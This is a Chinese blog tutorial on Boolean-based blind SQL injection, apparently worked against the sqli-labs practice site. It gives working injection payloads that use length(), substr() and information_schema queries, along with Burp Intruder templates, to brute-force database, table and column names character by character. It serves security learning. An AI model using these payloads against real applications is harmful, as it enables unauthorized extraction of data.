美文网首页
SQL注入-Boolean盲注

SQL注入-Boolean盲注

作者: 夜尽雪舞 | 来源:发表于2020-05-25 18:04 被阅读0次

特别声明:该文章只运用于学习安全测试交流之用,请勿用于其他

第一步:判断注入点,输入id=2 页面返回yes而输入2' and length(database())>=1 --+也返回yes,则说明id参数处存在注入点

图-1

第二步:利用二分法判断当前数据库名长度,>=9为no,>=8为yes,所以database名长度为8

图-2

第三步:利用substr判断数据库名

2' and substr(database(),1,1)='s' --+

图-3

利用Burp进行库名爆破,捕获到请求发送到Intruder模块

图-4

点击Positions,点击Clear$,选择要参数化部分点击Add$。因为需要确认databse每个字符所以设置如下

id=2%27%20and%20substr(database(),§1§,1)=%27§s§%27%20--+

图-5

设置第一个参数参数为1~8的整数,第二个参数为a-z的字母

图-6

点击右上角Start attack

图-7

查看执行结果,找出长度与其他不同的请求,最终得到结果

图-8

结果,当前数据库名为security

图-9

利用Burp进行表名爆破

2' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e' --+

id=2%27%20and%20substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),§1§,1)=%27§e§%27%20--+ 

第一个库名为emails

利用Burp进行列名爆破

id=2' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i' --+

相关文章

  • SQL注入-Boolean盲注

    特别声明:该文章只运用于学习安全测试交流之用,请勿用于其他 第一步:判断注入点,输入id=2 页面返回yes而输入...

  • 一步一步学习 Web 安全 2.4 union 联合查询注入

    对 SQL 注入有一个大致的了解后,我们再来深入学习。 SQL 注入有联合查询注入、报错注入、布尔盲注、时间盲注等...

  • 2019-02-24 sql注入

    sql注入主要分为显注和盲注,显注就是你注入的sql语句可以显示的显示到界面上,告诉你的语句对还是错。盲注就是不会...

  • sql注入之盲注

    所谓的盲注即是在sql注入后在前端没有出现报错信息,无法判断是否注入成功。所以需要盲注进行判断 盲注分为基于布尔型...

  • sql注入-盲注

    注入源代码 1.left()判断数据库版本

  • SQL注入之布尔盲注

    title: SQL注入之布尔盲注date: 2019-05-25 14:05:48tags:- SQL注入- 布...

  • sqli-lab之第二章--盲注

    第二章 盲注 注意: 本文大部分内容都是参考mysql注入天书 学习篇 何为盲注?盲注就是在 sql 注入过程中,...

  • bWAPP学习笔记 - A1 Injection (四)

    SQL Injection - Blind - Boolean-Based Level: Low 本题是布尔型盲注...

  • SQL注入靶场—盲注Rank1-2

    当存在注入点,但服务器没有返回sql执行后的结果回显,就可以使用盲注,盲注分为布尔注入和时间注入。 布尔注入涉及的...

  • 【SQL注入】如何提高盲注的效率

    0x01 SQL注入之盲注 提到SQL注入,我想懂安全的小伙伴们应该都知道的,那么今天就来聊一聊关于如何提高盲注效...

网友评论

      本文标题:SQL注入-Boolean盲注

      本文链接:https://www.haomeiwen.com/subject/bhbyahtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|SQL注入-Boolean盲注|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!